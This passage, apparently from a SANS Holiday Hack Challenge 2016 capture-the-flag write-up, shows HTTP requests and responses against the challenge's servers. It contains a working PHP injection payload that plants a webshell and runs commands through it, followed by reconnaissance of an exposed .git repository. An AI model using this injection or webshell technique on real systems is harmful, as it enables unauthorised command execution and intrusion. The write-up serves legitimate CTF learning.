&lt;span class="na"&gt;Connection&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="l"&gt;close&lt;/span&gt;
&lt;span class="na"&gt;Accept-Encoding&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="l"&gt;gzip&lt;/span&gt;
&lt;span class="na"&gt;Content-Length&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="l"&gt;309&lt;/span&gt;

&lt;span class="p"&gt;{&lt;/span&gt;&lt;span class="nt"&gt;&amp;quot;operation&amp;quot;&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;&lt;span class="s2"&gt;&amp;quot;WriteCrashDump&amp;quot;&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="nt"&gt;&amp;quot;data&amp;quot;&lt;/span&gt;&lt;span class="p"&gt;:{&lt;/span&gt;&lt;span class="nt"&gt;&amp;quot;message&amp;quot;&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;&lt;span class="s2"&gt;&amp;quot; &amp;#39;);system($_GET[&amp;#39;c&amp;#39;]);die();print(&amp;#39;&amp;quot;&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="nt"&gt;&amp;quot;lmessage&amp;quot;&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;&lt;span class="s2"&gt;&amp;quot;&amp;quot;&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="nt"&gt;&amp;quot;strace&amp;quot;&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;&lt;span class="s2"&gt;&amp;quot;&amp;quot;&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="nt"&gt;&amp;quot;model&amp;quot;&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;&lt;span class="s2"&gt;&amp;quot;&amp;quot;&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="nt"&gt;&amp;quot;sdkint&amp;quot;&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;&lt;span class="s2"&gt;&amp;quot;&amp;quot;&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="nt"&gt;&amp;quot;device&amp;quot;&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;&lt;span class="s2"&gt;&amp;quot;&amp;quot;&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="nt"&gt;&amp;quot;product&amp;quot;&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;&lt;span class="s2"&gt;&amp;quot;&amp;quot;&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="nt"&gt;&amp;quot;lversion&amp;quot;&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;&lt;span class="s2"&gt;&amp;quot;&amp;quot;&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="nt"&gt;&amp;quot;vmheapsz&amp;quot;&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;&lt;span class="s2"&gt;&amp;quot;&amp;quot;&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="nt"&gt;&amp;quot;vmallocmem&amp;quot;&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;&lt;span class="s2"&gt;&amp;quot;&amp;quot;&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="nt"&gt;&amp;quot;vmheapszlimit&amp;quot;&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;&lt;span class="s2"&gt;&amp;quot;&amp;quot;&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="nt"&gt;&amp;quot;natallocmem&amp;quot;&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;&lt;span class="s2"&gt;&amp;quot;&amp;quot;&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="nt"&gt;&amp;quot;cpuusage&amp;quot;&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;&lt;span class="s2"&gt;&amp;quot;&amp;quot;&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="nt"&gt;&amp;quot;totalstor&amp;quot;&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;&lt;span class="s2"&gt;&amp;quot;&amp;quot;&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="nt"&gt;&amp;quot;freestor&amp;quot;&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;&lt;span class="s2"&gt;&amp;quot;&amp;quot;&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="nt"&gt;&amp;quot;busystor&amp;quot;&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;&lt;span class="s2"&gt;&amp;quot;&amp;quot;&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="nt"&gt;&amp;quot;udid&amp;quot;&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;&lt;span class="s2"&gt;&amp;quot;&amp;quot;&lt;/span&gt;&lt;span class="p"&gt;}}&lt;/span&gt;
&lt;/pre&gt;&lt;/div&gt;
&lt;div class="highlight"&gt;&lt;pre&gt;&lt;span&gt;&lt;/span&gt;&lt;span class="kr"&gt;HTTP&lt;/span&gt;&lt;span class="o"&gt;/&lt;/span&gt;&lt;span class="m"&gt;1.1&lt;/span&gt; &lt;span class="m"&gt;200&lt;/span&gt; &lt;span class="ne"&gt;OK&lt;/span&gt;
&lt;span class="na"&gt;Server&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="l"&gt;nginx/1.10.2&lt;/span&gt;
&lt;span class="na"&gt;Date&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="l"&gt;Thu, 29 Dec 2016 16:01:28 GMT&lt;/span&gt;
&lt;span class="na"&gt;Content-Type&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="l"&gt;text/html; charset=UTF-8&lt;/span&gt;
&lt;span class="na"&gt;Connection&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="l"&gt;close&lt;/span&gt;
&lt;span class="na"&gt;Content-Length&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="l"&gt;81&lt;/span&gt;

{
    &amp;quot;success&amp;quot; : true,
    &amp;quot;folder&amp;quot; : &amp;quot;docs&amp;quot;,
    &amp;quot;crashdump&amp;quot; : &amp;quot;crashdump-F4Xkdl.php&amp;quot;
}
&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;We now have a functional webshell, stored in the &lt;code&gt;crashdump-F4Xkdl.php&lt;/code&gt;
file. We just have to put our wanted command in the &lt;code&gt;GET&lt;/code&gt; parameter
&lt;code&gt;c&lt;/code&gt;:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre&gt;&lt;span&gt;&lt;/span&gt;&lt;span class="hll"&gt;&lt;span class="nf"&gt;GET&lt;/span&gt; &lt;span class="nn"&gt;/docs/crashdump-F4Xkdl.php?c=whoami&lt;/span&gt; &lt;span class="kr"&gt;HTTP&lt;/span&gt;&lt;span class="o"&gt;/&lt;/span&gt;&lt;span class="m"&gt;1.1&lt;/span&gt;
&lt;/span&gt;&lt;span class="na"&gt;Content-Type&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="l"&gt;application/json&lt;/span&gt;
&lt;span class="na"&gt;User-Agent&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="l"&gt;Dalvik/2.1.0 (Linux; U; Android 7.1; Android SDK built for x86 Build/NPF26K)&lt;/span&gt;
&lt;span class="na"&gt;Host&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="l"&gt;ex.northpolewonderland.com&lt;/span&gt;
&lt;span class="na"&gt;Connection&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="l"&gt;close&lt;/span&gt;
&lt;span class="na"&gt;Accept-Encoding&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="l"&gt;gzip&lt;/span&gt;
&lt;span class="na"&gt;Content-Length&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="l"&gt;0&lt;/span&gt;
&lt;/pre&gt;&lt;/div&gt;
&lt;div class="highlight"&gt;&lt;pre&gt;&lt;span&gt;&lt;/span&gt;&lt;span class="kr"&gt;HTTP&lt;/span&gt;&lt;span class="o"&gt;/&lt;/span&gt;&lt;span class="m"&gt;1.1&lt;/span&gt; &lt;span class="m"&gt;200&lt;/span&gt; &lt;span class="ne"&gt;OK&lt;/span&gt;
&lt;span class="na"&gt;Server&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="l"&gt;nginx/1.10.2&lt;/span&gt;
&lt;span class="na"&gt;Date&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="l"&gt;Thu, 29 Dec 2016 16:03:01 GMT&lt;/span&gt;
&lt;span class="na"&gt;Content-Type&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="l"&gt;text/html; charset=UTF-8&lt;/span&gt;
&lt;span class="na"&gt;Connection&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="l"&gt;close&lt;/span&gt;
&lt;span class="na"&gt;Content-Length&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="l"&gt;28&lt;/span&gt;

{
&lt;span class="hll"&gt;    &amp;quot;message&amp;quot;: &amp;quot; www-data
&lt;/span&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;Yes, our command was executed properly. We can now list the content of the
webroot:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre&gt;&lt;span&gt;&lt;/span&gt;&lt;span class="hll"&gt;&lt;span class="nf"&gt;GET&lt;/span&gt; &lt;span class="nn"&gt;/docs/crashdump-F4Xkdl.php?c=ls+-lh+../&lt;/span&gt; &lt;span class="kr"&gt;HTTP&lt;/span&gt;&lt;span class="o"&gt;/&lt;/span&gt;&lt;span class="m"&gt;1.1&lt;/span&gt;
&lt;/span&gt;&lt;span class="na"&gt;Content-Type&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="l"&gt;application/json&lt;/span&gt;
&lt;span class="na"&gt;User-Agent&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="l"&gt;Dalvik/2.1.0 (Linux; U; Android 7.1; Android SDK built for x86 Build/NPF26K)&lt;/span&gt;
&lt;span class="na"&gt;Host&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="l"&gt;ex.northpolewonderland.com&lt;/span&gt;
&lt;span class="na"&gt;Connection&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="l"&gt;close&lt;/span&gt;
&lt;span class="na"&gt;Accept-Encoding&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="l"&gt;gzip&lt;/span&gt;
&lt;span class="na"&gt;Content-Length&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="l"&gt;0&lt;/span&gt;
&lt;/pre&gt;&lt;/div&gt;
&lt;div class="highlight"&gt;&lt;pre&gt;&lt;span&gt;&lt;/span&gt;&lt;span class="kr"&gt;HTTP&lt;/span&gt;&lt;span class="o"&gt;/&lt;/span&gt;&lt;span class="m"&gt;1.1&lt;/span&gt; &lt;span class="m"&gt;200&lt;/span&gt; &lt;span class="ne"&gt;OK&lt;/span&gt;
&lt;span class="na"&gt;Server&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="l"&gt;nginx/1.10.2&lt;/span&gt;
&lt;span class="na"&gt;Date&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="l"&gt;Thu, 29 Dec 2016 16:04:14 GMT&lt;/span&gt;
&lt;span class="na"&gt;Content-Type&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="l"&gt;text/html; charset=UTF-8&lt;/span&gt;
&lt;span class="na"&gt;Connection&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="l"&gt;close&lt;/span&gt;
&lt;span class="na"&gt;Content-Length&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="l"&gt;237&lt;/span&gt;

{
    &amp;quot;message&amp;quot;: &amp;quot; total 352K
&lt;span class="hll"&gt;-rw-r--r-- 1 jeff     jeff     219K Dec  7 17:08 discombobulated-audio-6-XyzE3N9YqKNH.mp3
&lt;/span&gt;drwxr-xr-x 2 www-data www-data 124K Dec 29 16:01 docs
-r--r--r-- 1 www-data www-data 2.4K Dec  7 16:58 exception.php
&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;We now have the name of the audio file, without having to rely on the comment
in the &lt;code&gt;exception.php&lt;/code&gt; file, we're such haXXorz. Anyway, the URL to the
audio file is: &lt;a class="reference external" href="http://ex.northpolewonderland.com/discombobulated-audio-6-XyzE3N9YqKNH.mp3"&gt;http://ex.northpolewonderland.com/discombobulated-audio-6-XyzE3N9YqKNH.mp3&lt;/a&gt;&lt;/p&gt;
&lt;img alt="ex_audio_result.png" class="align-center" src="/images/sans-christmas-challenge-2016/ex_audio_result.png" /&gt;
&lt;/div&gt;
&lt;div class="section" id="the-mobile-analytics-server-post-authentication"&gt;
&lt;h3&gt;&lt;a class="reference external" href="https://analytics.northpolewonderland.com/"&gt;The Mobile Analytics Server (post authentication)&lt;/a&gt;&lt;/h3&gt;
&lt;p&gt;We may have found the first audio file in the analytics server by logging in,
but we haven't taken a look at the functionalities offered by the server.
Basically, we can query some usage information of the Android application,
and save these queries:&lt;/p&gt;
&lt;ul class="simple"&gt;
&lt;li&gt;First, we performed a query, that we save:&lt;/li&gt;
&lt;/ul&gt;
&lt;img alt="analytics_guest_query.png" class="align-center" src="/images/sans-christmas-challenge-2016/analytics_guest_query.png" /&gt;
&lt;ul class="simple"&gt;
&lt;li&gt;Then, we get the result of our query:&lt;/li&gt;
&lt;/ul&gt;
&lt;img alt="analytics_guest_query_result.png" class="align-center" src="/images/sans-christmas-challenge-2016/analytics_guest_query_result.png" /&gt;
&lt;ul class="simple"&gt;
&lt;li&gt;We can then consult the result of our saved query:&lt;/li&gt;
&lt;/ul&gt;
&lt;img alt="analytics_guest_query_saved.png" class="align-center" src="/images/sans-christmas-challenge-2016/analytics_guest_query_saved.png" /&gt;
&lt;p&gt;Playing with the different parameters to conduct usual attacks (SQLi, LFI,
etc.) didn't lead to anything. On the suggestion of one of the elves, we can
use &lt;code&gt;nmap -sC&lt;/code&gt; to find interesting files hosted by the web server:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre&gt;&lt;span&gt;&lt;/span&gt;&lt;span class="gp"&gt;$&lt;/span&gt; nmap -sC analytics.northpolewonderland.com
&lt;span class="go"&gt;Starting Nmap 6.47 ( http://nmap.org ) at 2016-12-26 11:52 CET&lt;/span&gt;
&lt;span class="go"&gt;Nmap scan report for analytics.northpolewonderland.com (104.198.252.157)&lt;/span&gt;
&lt;span class="go"&gt;Host is up (0.14s latency).&lt;/span&gt;
&lt;span class="go"&gt;rDNS record for 104.198.252.157: 157.252.198.104.bc.googleusercontent.com&lt;/span&gt;
&lt;span class="go"&gt;Not shown: 998 filtered ports&lt;/span&gt;
&lt;span class="go"&gt;PORT    STATE SERVICE&lt;/span&gt;
&lt;span class="go"&gt;22/tcp  open  ssh&lt;/span&gt;
&lt;span class="go"&gt;|_ssh-hostkey: ERROR: Script execution failed (use -d to debug)&lt;/span&gt;
&lt;span class="go"&gt;443/tcp open  https&lt;/span&gt;
&lt;span class="go"&gt;| http-git:&lt;/span&gt;
&lt;span class="go"&gt;|   104.198.252.157:443/.git/&lt;/span&gt;
&lt;span class="hll"&gt;&lt;span class="go"&gt;|     Git repository found!&lt;/span&gt;
&lt;/span&gt;&lt;span class="go"&gt;|     Repository description: Unnamed repository; edit this file &amp;#39;description&amp;#39; to name the...&lt;/span&gt;
&lt;span class="go"&gt;|_    Last commit message: Finishing touches (style, css, etc)&lt;/span&gt;
&lt;span class="go"&gt;|_http-methods: No Allow or Public header in OPTIONS response (status code 405)&lt;/span&gt;
&lt;span class="go"&gt;| http-title: Sprusage Usage Reporter!&lt;/span&gt;
&lt;span class="go"&gt;|_Requested resource was login.php&lt;/span&gt;
&lt;span class="go"&gt;| ssl-cert: Subject: commonName=analytics.northpolewonderland.com&lt;/span&gt;
&lt;span class="go"&gt;| Not valid before: 2016-12-07T17:35:00+00:00&lt;/span&gt;
&lt;span class="go"&gt;|_Not valid after:  2017-03-07T17:35:00+00:00&lt;/span&gt;
&lt;span class="go"&gt;|_ssl-date: 1970-06-11T20:44:11+00:00; -46y197d14h08m10s from local time.&lt;/span&gt;
&lt;span class="go"&gt;| tls-nextprotoneg:&lt;/span&gt;
&lt;span class="go"&gt;|_  http/1.1&lt;/span&gt;
&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;A Git repository was found. That's very interesting, because it means we can
download the source code of the website to analyze it. It also means that we
have access to the history of every file modifications. Let's download the
source of the web site with &lt;code&gt;wget&lt;/code&gt;:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre&gt;&lt;span&gt;&lt;/span&gt;&lt;span class="gp"&gt;$&lt;/span&gt; wget -r -k -np https://analytics.northpolewonderland.com/.git/
&lt;span class="go"&gt;--2016-12-26 11:53:55--  https://analytics.northpolewonderland.com/.git/&lt;/span&gt;
&lt;span class="go"&gt;Résolution de analytics.northpolewonderland.com (analytics.northpolewonderland.com)… 104.198.252.157&lt;/span&gt;
&lt;span class="go"&gt;Connexion à analytics.northpolewonderland.com (analytics.northpolewonderland.com)|104.198.252.157|:443… connecté.&lt;/span&gt;
&lt;span class="go"&gt;requête HTTP transmise, en attente de la réponse… 200 OK&lt;/span&gt;
&lt;span class="go"&gt;Taille : non indiqué [text/html]&lt;/span&gt;
&lt;span class="go"&gt;Sauvegarde en : « analytics.northpolewonderland.com/.git/index.html »&lt;/span&gt;

&lt;span class="go"&gt;analytics.northpolewonderland.com/.git/index.html     [ &amp;lt;=&amp;gt;                                                                                                          ]   1,36K  --.-KB/s   ds 0s&lt;/span&gt;

&lt;span class="go"&gt;2016-12-26 11:53:56 (14,2 MB/s) - « analytics.northpolewonderland.com/.git/index.html » sauvegardé [1394]&lt;/span&gt;

&lt;span class="go"&gt;Chargement de robots.txt ; veuillez ignorer les erreurs.&lt;/span&gt;
&lt;span class="go"&gt;--2016-12-26 11:53:56--  https://analytics.northpolewonderland.com/robots.txt&lt;/span&gt;
&lt;span class="go"&gt;Réutilisation de la connexion existante à analytics.northpolewonderland.com:443.&lt;/span&gt;
&lt;span class="go"&gt;requête HTTP transmise, en attente de la réponse… 404 Not Found&lt;/span&gt;
&lt;span class="go"&gt;2016-12-26 11:53:56 erreur 404 : Not Found.&lt;/span&gt;

&lt;span class="go"&gt;--2016-12-26 11:53:56--  https://analytics.northpolewonderland.com/.git/branches/&lt;/span&gt;
&lt;span class="go"&gt;Réutilisation de la connexion existante à analytics.northpolewonderland.com:443.&lt;/span&gt;
&lt;span class="go"&gt;requête HTTP transmise, en attente de la réponse… 200 OK&lt;/span&gt;
&lt;span class="go"&gt;Taille : non indiqué [text/html]&lt;/span&gt;
&lt;span class="go"&gt;Sauvegarde en : « analytics.northpolewonderland.com/.git/branches/index.html »&lt;/span&gt;

&lt;span class="go"&gt;[...]&lt;/span&gt;

&lt;span class="go"&gt;--2016-12-26 11:54:45--  https://analytics.northpolewonderland.com/.git/logs/refs/heads/master&lt;/span&gt;
&lt;span class="go"&gt;Réutilisation de la connexion existante à analytics.northpolewonderland.com:443.&lt;/span&gt;
&lt;span class="go"&gt;requête HTTP transmise, en attente de la réponse… 200 OK&lt;/span&gt;
&lt;span class="go"&gt;Taille : 4284 (4,2K) [application/octet-stream]&lt;/span&gt;
&lt;span class="go"&gt;Sauvegarde en : « analytics.northpolewonderland.com/.git/logs/refs/heads/master »&lt;/span&gt;

&lt;span class="go"&gt;analytics.northpolewonderland.com/.git/logs/refs/ 100%[=============================================================================================================&amp;gt;]   4,18K  --.-KB/s   ds 0s&lt;/span&gt;

&lt;span class="go"&gt;2016-12-26 11:54:45 (45,9 MB/s) — « analytics.northpolewonderland.com/.git/logs/refs/heads/master » sauvegardé [4284/4284]&lt;/span&gt;

&lt;span class="go"&gt;Terminé — 2016-12-26 11:54:45 —&lt;/span&gt;
&lt;span class="go"&gt;Temps total effectif : 50s&lt;/span&gt;
&lt;span class="go"&gt;Téléchargés : 305 fichiers, 614K en 0,9s (695 KB/s)&lt;/span&gt;
&lt;span class="gp"&gt;$&lt;/span&gt; ls -la analytics.northpolewonderland.com
&lt;span class="go"&gt;total 12&lt;/span&gt;
&lt;span class="go"&gt;drwxr-xr-x 3 yme yme 4096 déc.  26 14:44 .&lt;/span&gt;
&lt;span class="go"&gt;drwxr-xr-x 3 yme yme 4096 déc.  26 14:44 ..&lt;/span&gt;
&lt;span class="go"&gt;drwxr-xr-x 8 yme yme 4096 déc.  26 14:45 .git&lt;/span&gt;
&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;Alright, the Git repository was completely downloaded, but the source files
don't seem to be here. Let's inspect the Git repository:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre&gt;&lt;span&gt;&lt;/span&gt;&lt;span class="gp"&gt;$&lt;/span&gt; &lt;span class="nb"&gt;cd&lt;/span&gt; analytics.northpolewonderland.com
&lt;span class="gp"&gt;$&lt;/span&gt; git status
&lt;span class="go"&gt;Sur la branche master&lt;/span&gt;
&lt;span class="go"&gt;Modifications qui ne seront pas validées :&lt;/span&gt;
&lt;span class="go"&gt;  (utilisez &amp;quot;git add/rm &amp;lt;fichier&amp;gt;...&amp;quot; pour mettre à jour ce qui sera validé)&lt;/span&gt;
&lt;span class="go"&gt;  (utilisez &amp;quot;git checkout -- &amp;lt;fichier&amp;gt;...&amp;quot; pour annuler les modifications dans la copie de travail)&lt;/span&gt;

&lt;span class="go"&gt;    supprimé :        README.md&lt;/span&gt;
&lt;span class="go"&gt;    supprimé :        crypto.php&lt;/span&gt;
&lt;span class="go"&gt;    supprimé :        css/bootstrap-theme.css&lt;/span&gt;
&lt;span class="go"&gt;    supprimé :        css/bootstrap-theme.css.map&lt;/span&gt;
&lt;span class="go"&gt;    supprimé :        css/bootstrap-theme.min.css&lt;/span&gt;
&lt;span class="go"&gt;    supprimé :        css/bootstrap-theme.min.css.map&lt;/span&gt;
&lt;span class="go"&gt;    supprimé :        css/bootstrap.css&lt;/span&gt;
&lt;span class="go"&gt;    supprimé :        css/bootstrap.css.map&lt;/span&gt;
&lt;span class="go"&gt;    supprimé :        css/bootstrap.min.css&lt;/span&gt;
&lt;span class="go"&gt;    supprimé :        css/bootstrap.min.css.map&lt;/span&gt;
&lt;span class="go"&gt;    supprimé :        css/bootstrap.min.css.orig&lt;/span&gt;
&lt;span class="go"&gt;    supprimé :        db.php&lt;/span&gt;
&lt;span class="go"&gt;    supprimé :        edit.php&lt;/span&gt;
&lt;span class="go"&gt;    supprimé :        fonts/glyphicons-halflings-regular.eot&lt;/span&gt;
&lt;span class="go"&gt;    supprimé :        fonts/glyphicons-halflings-regular.svg&lt;/span&gt;
&lt;span class="go"&gt;    supprimé :        fonts/glyphicons-halflings-regular.ttf&lt;/span&gt;
&lt;span class="go"&gt;    supprimé :        fonts/glyphicons-halflings-regular.woff&lt;/span&gt;
&lt;span class="go"&gt;    supprimé :        fonts/glyphicons-halflings-regular.woff2&lt;/span&gt;
&lt;span class="go"&gt;    supprimé :        footer.php&lt;/span&gt;
&lt;span class="go"&gt;    supprimé :        getaudio.php&lt;/span&gt;
&lt;span class="go"&gt;    supprimé :        header.php&lt;/span&gt;
&lt;span class="go"&gt;    supprimé :        index.php&lt;/span&gt;
&lt;span class="go"&gt;    supprimé :        js/bootstrap.js&lt;/span&gt;
&lt;span class="go"&gt;    supprimé :        js/bootstrap.min.js&lt;/span&gt;
&lt;span class="go"&gt;    supprimé :        js/npm.js&lt;/span&gt;
&lt;span class="go"&gt;    supprimé :        login.php&lt;/span&gt;
&lt;span class="go"&gt;    supprimé :        logout.php&lt;/span&gt;
&lt;span class="go"&gt;    supprimé :        mp3.php&lt;/span&gt;
&lt;span class="go"&gt;    supprimé :        query.php&lt;/span&gt;
&lt;span class="go"&gt;    supprimé :        report.php&lt;/span&gt;
&lt;span class="go"&gt;    supprimé :        sprusage.sql&lt;/span&gt;
&lt;span class="go"&gt;    supprimé :        test/Gemfile&lt;/span&gt;
&lt;span class="go"&gt;    supprimé :        test/Gemfile.lock&lt;/span&gt;
&lt;span class="go"&gt;    supprimé :        test/test_client.rb&lt;/span&gt;
&lt;span class="go"&gt;    supprimé :        this_is_html.php&lt;/span&gt;
&lt;span class="go"&gt;    supprimé :        this_is_json.php&lt;/span&gt;
&lt;span class="go"&gt;    supprimé :        uuid.php&lt;/span&gt;
&lt;span class="go"&gt;    supprimé :        view.php&lt;/span&gt;
&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;Sorry about the French Git output, but &amp;quot;supprimé&amp;quot; means &amp;quot;deleted&amp;quot;. So, every
source file was deleted, but the deletion was not commited, which means we can
cancel the deletion:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre&gt;&lt;span&gt;&lt;/span&gt;&lt;span class="gp"&gt;$&lt;/span&gt; git checkout -- .
&lt;span class="gp"&gt;$&lt;/span&gt; ls
&lt;span class="go"&gt;crypto.php  db.php    fonts       getaudio.php  index.php  login.php   mp3.php    README.md   sprusage.sql  this_is_html.php  uuid.php&lt;/span&gt;
&lt;span class="go"&gt;css         edit.php  footer.php  header.php    js         logout.php  query.php  report.php  test          this_is_json.php  view.php&lt;/span&gt;
&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;You can download the code source archive &lt;a class="reference external" href="/docs/sans-christmas-challenge-2016/analytics.northpolewonderland.com_sources.tar.gz"&gt;here&lt;/a&gt;
(sha256: &lt;code&gt;13a4f237f817300e1e23a95edaf4ea407a4a346d20c2115ca13eea30b69ee65c&lt;/code&gt;).
It contains the Git repository.&lt;/p&gt;
&lt;p&gt;Alright, we now have access to the source code of the web application! This
should makes things easier. First of all, we can see that there's a file
&lt;code&gt;edit.php&lt;/code&gt;, which is not accessible when we're connected as
&lt;code&gt;guest&lt;/code&gt;:&lt;/p&gt;
&lt;img alt="analytics_guest_edit_denied.png" class="align-center" src="/images/sans-christmas-challenge-2016/analytics_guest_edit_denied.png" /&gt;
&lt;p&gt;Indeed, the &lt;code&gt;edit.php&lt;/code&gt; page is only accessible to the
&lt;code&gt;administrator&lt;/code&gt; user:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre&gt;&lt;span&gt;&lt;/span&gt;&lt;span class="x"&gt;# File edit.php&lt;/span&gt;
&lt;span class="cp"&gt;&amp;lt;?php&lt;/span&gt;
  &lt;span class="c1"&gt;# This should be the first require&lt;/span&gt;
  &lt;span class="k"&gt;require_once&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="s1"&gt;&amp;#39;this_is_html.php&amp;#39;&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
  &lt;span class="k"&gt;require_once&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="s1"&gt;&amp;#39;db.php&amp;#39;&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;

  &lt;span class="c1"&gt;# Don&amp;#39;t allow anybody to access this page (yet!)&lt;/span&gt;
&lt;span class="hll"&gt;  &lt;span class="nx"&gt;restrict_page_to_users&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="nv"&gt;$db&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="p"&gt;[]);&lt;/span&gt;
&lt;/span&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;div class="highlight"&gt;&lt;pre&gt;&lt;span&gt;&lt;/span&gt;&lt;span class="x"&gt;# File this_is_html.php&lt;/span&gt;
&lt;span class="cp"&gt;&amp;lt;?php&lt;/span&gt;
&lt;span class="p"&gt;[&lt;/span&gt;&lt;span class="o"&gt;...&lt;/span&gt;&lt;span class="p"&gt;]&lt;/span&gt;
  &lt;span class="k"&gt;function&lt;/span&gt; &lt;span class="nf"&gt;restrict_page_to_users&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="nv"&gt;$db&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="nv"&gt;$users&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
&lt;span class="hll"&gt;    &lt;span class="nv"&gt;$username&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="nx"&gt;get_username&lt;/span&gt;&lt;span class="p"&gt;();&lt;/span&gt;
&lt;/span&gt;
    &lt;span class="k"&gt;if&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="o"&gt;!&lt;/span&gt;&lt;span class="nv"&gt;$username&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
